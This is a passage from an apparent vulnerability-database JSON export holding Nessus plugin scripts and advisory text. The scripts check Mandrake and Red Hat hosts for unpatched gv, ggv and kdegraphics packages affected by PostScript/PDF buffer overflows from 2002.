These updates provide patched versions of gv\nand ggv to fix the vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ggv and / or gv packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ggv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva 
/ Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"ggv-1.1.0-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"gv-3.5.8-18.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"ggv-1.1.0-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"gv-3.5.8-27.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"ggv-1.1.94-2.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"gv-3.5.8-27.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"ggv-1.99.9-1.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"gv-3.5.8-27.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:14", "description": "Updated packages for gv, ggv, and kdegraphics fix a local buffer\noverflow when reading malformed PDF or PostScript files.\n\n[Updated 07 Jan 2003] Added fixed packages for the Itanium (IA64)\narchitecture.\n\n[Updated 06 Feb 2003] Added fixed packages for Advanced Workstation\n2.1\n\nGv and ggv are user interfaces for the Ghostscript PostScript(R)\ninterpreter used to display PostScript and PDF documents on an X\nWindow System. KGhostview is the PostScript viewer for the K Desktop\nEnvironment.\n\nZen Parse found a local buffer overflow in gv version 3.5.8 and\nearlier. 
An attacker can create a carefully crafted malformed PDF or\nPostScript file in such a way that when that file is viewed arbitrary\ncommands can be executed.\n\nggv and kghostview contain code derived from gv and therefore have the\nsame vulnerability.\n\nAll users of gv, ggv, and kghostview are advised to upgrade to the\nerrata packages which contain patches to correct the vulnerability.", "edition": 27, "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : ggv (RHSA-2002:211)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:kdegraphics-devel", "p-cpe:/a:redhat:enterprise_linux:ggv", "p-cpe:/a:redhat:enterprise_linux:kdegraphics", "p-cpe:/a:redhat:enterprise_linux:gv"], "id": "REDHAT-RHSA-2002-211.NASL", "href": "https://www.tenable.com/plugins/nessus/12325", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2002:211. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12325);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_xref(name:\"RHSA\", value:\"2002:211\");\n\n script_name(english:\"RHEL 2.1 : ggv (RHSA-2002:211)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for gv, ggv, and kdegraphics fix a local buffer\noverflow when reading malformed PDF or PostScript files.\n\n[Updated 07 Jan 2003] Added fixed packages for the Itanium (IA64)\narchitecture.\n\n[Updated 06 Feb 2003] Added fixed packages for Advanced Workstation\n2.1\n\nGv and ggv are user interfaces for the Ghostscript PostScript(R)\ninterpreter used to display PostScript and PDF documents on an X\nWindow System. KGhostview is the PostScript viewer for the K Desktop\nEnvironment.\n\nZen Parse found a local buffer overflow in gv version 3.5.8 and\nearlier. 
An attacker can create a carefully crafted malformed PDF or\nPostScript file in such a way that when that file is viewed arbitrary\ncommands can be executed.\n\nggv and kghostview contain code derived from gv and therefore have the\nsame vulnerability.\n\nAll users of gv, ggv, and kghostview are advised to upgrade to the\nerrata packages which contain patches to correct the vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2002-0838\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=103305778615625&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=103305778615625&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2002:211\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ggv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdegraphics\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdegraphics-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2002:211\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ggv-1.0.2-5.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"gv-3.5.8-18.7x\")) flag++;\n if 
(rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kdegraphics-2.2.2-2.1\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"kdegraphics-devel-2.2.2-2.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ggv / gv / kdegraphics / kdegraphics-devel\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:17", "description": "A vulnerability exists in KGhostview, part of the kdegraphics package.\nIt includes a DSC 3.0 parser from GSview which is vulnerable to a\nbuffer overflow while parsing a specially crafted .ps file. It also\ncontains code from gv which is vulnerable to a similar buffer overflow\ntriggered by malformed PostScript and PDF files. This has been fixed\nin KDE 3.0.4 and patches have been applied to correct these packages.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : kdegraphics (MDKSA-2002:071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838", "CVE-2002-0836", "CVE-2002-1223"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kdegraphics-devel", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:kdegraphics-static-devel", "p-cpe:/a:mandriva:linux:kdegraphics", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "cpe:/o:mandrakesoft:mandrake_linux:8.1"], "id": "MANDRAKE_MDKSA-2002-071.NASL", "href": "https://www.tenable.com/plugins/nessus/13971", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2002:071. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13971);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-0836\", \"CVE-2002-0838\", \"CVE-2002-1223\");\n script_xref(name:\"MDKSA\", value:\"2002:071\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kdegraphics (MDKSA-2002:071)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability exists in KGhostview, part of the kdegraphics package.\nIt includes a DSC 3.0 parser from GSview then is vulnerable to a\nbuffer overflow while parsing a specially crafted .ps file. It also\ncontains code from gv which is vulnerable to a similar buffer overflow\ntriggered by malformed PostScript and PDF files. 
This has been fixed\nin KDE 3.0.4 and patches have been applied to correct these packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20021008-1.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected kdegraphics, kdegraphics-devel and / or\nkdegraphics-static-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kdegraphics\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kdegraphics-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kdegraphics-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif 
(!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kdegraphics-2.2.1-2.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"kdegraphics-static-devel-2.2.1-2.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kdegraphics-2.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"kdegraphics-devel-2.2.2-15.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"kdegraphics-3.0.3-11.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"kdegraphics-devel-3.0.3-11.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}